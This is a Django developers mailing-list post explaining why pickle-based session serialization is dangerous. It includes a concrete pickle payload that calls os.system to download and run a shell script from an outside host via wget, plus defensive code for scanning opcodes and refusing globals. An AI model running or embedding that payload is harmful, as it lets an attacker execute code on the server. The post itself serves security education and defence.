> JSON backend didn't allow serialization of arbitrary data, as such it was
> different to all the other backends which do allow it -- which means this
> backend isn't a drop-in replacement.

Yeah, I agree. The cookie-based backend is already a bit "special", since it
is functionally limited to around 4k.

> P.S.: Btw, if you leak your secret key, you can get an admin user with a
> json backend too, while not being remote code execution it's still
> something I would consider as catastrophic as code execution in most of
> my projects.

No. It's far less catastrophic. It just means I'm a Django admin and can
trash that project (which you can then restore from the backups). I can't
own all your other Django projects on the same machine, steal your deploy
keys, root your server, and then configure it to attack your dev machine
when you SSH into it to see why weird things are happening. Remote code
execution is BAD.

> Oh and I know I am moving to thin ice now, but I'd still like to know: To
> my understanding pickle doesn't necessarily allow arbitrary code execution, I
<snip>
> like to understand what such an attack would look like -- so I would
> appreciate if you could give a more or less concrete example

I should not have skipped that demo during my Djangocon talk. Since you
asked nicely... try this:

data = "cos\nsystem\n(S'wget -q -O - subversivecode.com/evil.sh | sh'\ntR.'"
import pickle; pickle.loads(data)

And then open a new bash window.

Obviously that payload could be a whole lot more malicious. A rootkit and a
reverse shell would be traditional. As I said in the talk, pickle == eval.
Don't use pickle where you wouldn't use eval.

You can look at how the pickle works by running:
import pickletools; print pickletools.dis(data)

Hopefully that example was more or less concrete enough for you. ;)

-Paul
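As an added illustration of the "pickle == eval" point (this is not code from the mail above or from Django), here is what the defensive side looks like in Python 3: a static opcode scan using the same pickletools stream that `pickletools.dis` prints, and a restricted Unpickler that refuses every global lookup so the GLOBAL/REDUCE pair the demo relies on cannot resolve anything. The sample inputs are constructed: an ordinary session-like dict, and a pickle with the same opcode shape as the demo but with the harmless `os.getcwd` standing in for `os.system`. Function names (`suspicious_opcodes`, `restricted_loads`, `load_untrusted`) are my own.

```python
import io
import pickle
import pickletools

# Opcodes that can resolve an importable by name or call something on the
# stack. A pickle that only carries data (dicts, lists, strings, numbers)
# never needs any of them; a 'cos\nsystem\n...tR.' style payload needs
# GLOBAL (c) and REDUCE (R).
CODE_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ",
                "NEWOBJ", "NEWOBJ_EX", "REDUCE"}


def disassemble(data: bytes) -> str:
    """Return the pickletools.dis listing as a string instead of printing it."""
    out = io.StringIO()
    pickletools.dis(data, out=out)
    return out.getvalue()


def suspicious_opcodes(data: bytes) -> list:
    """Static scan: walk the opcode stream without executing it and list the
    opcodes that import or call code, in the order they appear."""
    return [op.name for op, _arg, _pos in pickletools.genops(data)
            if op.name in CODE_OPCODES]


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global lookup. find_class is the hook the
    GLOBAL/STACK_GLOBAL opcodes go through, so nothing outside the builtin
    data types can be reconstructed, let alone called."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            f"pickle tried to load {module}.{name}; globals are forbidden")


def restricted_loads(data: bytes):
    """Unpickle with the restricted class; raises UnpicklingError on globals."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def load_untrusted(data: bytes):
    """Two independent gates: the static scan first, then the restricted
    unpickler. Returns (accepted, value_or_reason)."""
    flagged = suspicious_opcodes(data)
    if flagged:
        return False, f"rejected by opcode scan: {flagged}"
    try:
        return True, restricted_loads(data)
    except pickle.UnpicklingError as exc:
        return False, f"rejected by RestrictedUnpickler: {exc}"


# Constructed sample inputs (hypothetical, not taken from the mail):
# 1. an ordinary session-like dict, the kind of thing a session backend stores
SAFE_PICKLE = pickle.dumps({"user_id": 42, "cart": ["apple", "pear"]})
# 2. the same opcode shape as the demo, with the harmless os.getcwd in place
#    of os.system: GLOBAL os.getcwd, MARK, TUPLE, REDUCE, STOP
LOOKUP_PICKLE = b"cos\ngetcwd\n(tR."

if __name__ == "__main__":
    print(disassemble(LOOKUP_PICKLE))
    print(load_untrusted(SAFE_PICKLE))
    print(load_untrusted(LOOKUP_PICKLE))
```

Neither gate makes pickle safe for untrusted input in general; the restricted unpickler is the one that actually holds, the opcode scan is a cheap early signal you can log on. For session data the real fix remains the one the thread is about: a data-only format such as JSON behind a signature.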

-- 
You received this message because you are subscribed to the Google Groups 
"Django developers" group.
To post to this group, send email to django-developers@googlegroups.com.